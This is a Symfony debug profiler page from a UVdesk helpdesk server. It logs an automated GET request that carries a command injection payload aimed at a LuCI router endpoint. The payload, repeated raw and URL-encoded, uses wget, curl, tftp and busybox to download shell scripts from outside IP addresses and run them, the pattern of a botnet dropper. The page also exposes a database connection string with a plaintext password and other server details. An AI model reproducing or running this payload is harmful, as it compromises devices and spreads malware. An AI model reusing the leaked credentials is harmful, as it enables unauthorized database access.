n/a
Request
GET Parameters
Key | Value |
---|---|
country | "$(id>`wget http://193.111.248.148:5001; curl http://193.111.248.148:5001; wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; tftp 103.161.34.97 -c get tftp1.sh && chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; tftp -r tftp2.sh -g 103.161.34.97 && chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh; /bin/busybox wget -g 103.161.34.97 -l /tmp/.oxy -r /bins/; /bin/busybox wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox tftp 103.161.34.97 -c get tftp1.sh && /bin/busybox chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; /bin/busybox tftp -r tftp2.sh -g 103.161.34.97 && /bin/busybox chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh`)" |
form | "country" |
operation | "write" |
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_firewall_context | "security.firewall.map.context.customer" |
_remove_csp_headers | true |
_stopwatch_token | "eabb7b" |
Request Headers
Header | Value |
---|---|
accept-encoding | "gzip" |
authorization | "" |
host | "34.255.34.220" |
user-agent | "Go-http-client/1.1" |
x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
Header | Value |
---|---|
access-control-allow-headers | [ "Access-Control-Allow-Origin" "Authorization" "Content-Type" ] |
access-control-allow-methods | "GET,POST,PUT,OPTIONS" |
access-control-allow-origin | "*" |
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Fri, 20 Sep 2024 21:39:59 GMT" |
vary | "Accept" |
x-debug-exception | "No%20route%20found%20for%20%22GET%20http%3A%2F%2F34.255.34.220%2Fcgi-bin%2Fluci%2F%3Bstok%3D%2Flocale%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fuvdesk%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
x-debug-token | "8ef809" |
x-previous-debug-token | "a50edb" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "YOUR_APP_SECRET" |
DATABASE_URL | "mysql://uvdesk_rw:T154l@bs2020@localhost:3306/uvdesk?serverVersion=15.1" |
MAILER_URL | "null://localhost" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTEXT_DOCUMENT_ROOT | "/var/www/uvdesk/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/uvdesk/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTP_ACCEPT_ENCODING | "gzip" |
HTTP_AUTHORIZATION | "" |
HTTP_HOST | "34.255.34.220" |
HTTP_USER_AGENT | "Go-http-client/1.1" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PATH_INFO | "/cgi-bin/luci/;stok=/locale" |
PATH_TRANSLATED | "redirect:/./index.php/cgi-bin/luci/;stok=/locale/luci/;stok=/locale" |
PHP_SELF | "/index.php/cgi-bin/luci/;stok=/locale" |
QUERY_STRING | "form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)" |
REDIRECT_QUERY_STRING | "form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)" |
REDIRECT_SCRIPT_URI | "http://34.255.34.220/cgi-bin/luci/;stok=/locale" |
REDIRECT_SCRIPT_URL | "/cgi-bin/luci/;stok=/locale" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/cgi-bin/luci/;stok=/locale" |
REMOTE_ADDR | "85.90.246.83" |
REMOTE_PORT | "41544" |
REQUEST_METHOD | "GET" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1726868399 |
REQUEST_TIME_FLOAT | 1726868399.0294 |
REQUEST_URI | "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)" |
SCRIPT_FILENAME | "/var/www/uvdesk/public/index.php" |
SCRIPT_NAME | "/index.php" |
SCRIPT_URI | "http://34.255.34.220/cgi-bin/luci/;stok=/locale" |
SCRIPT_URL | "/cgi-bin/luci/;stok=/locale" |
SERVER_ADDR | "172.26.5.140" |
SERVER_ADMIN | "admin@tisalabs.com" |
SERVER_NAME | "34.255.34.220" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.52 (Ubuntu) Server at 34.255.34.220 Port 80</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.52 (Ubuntu)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MAILER_URL" |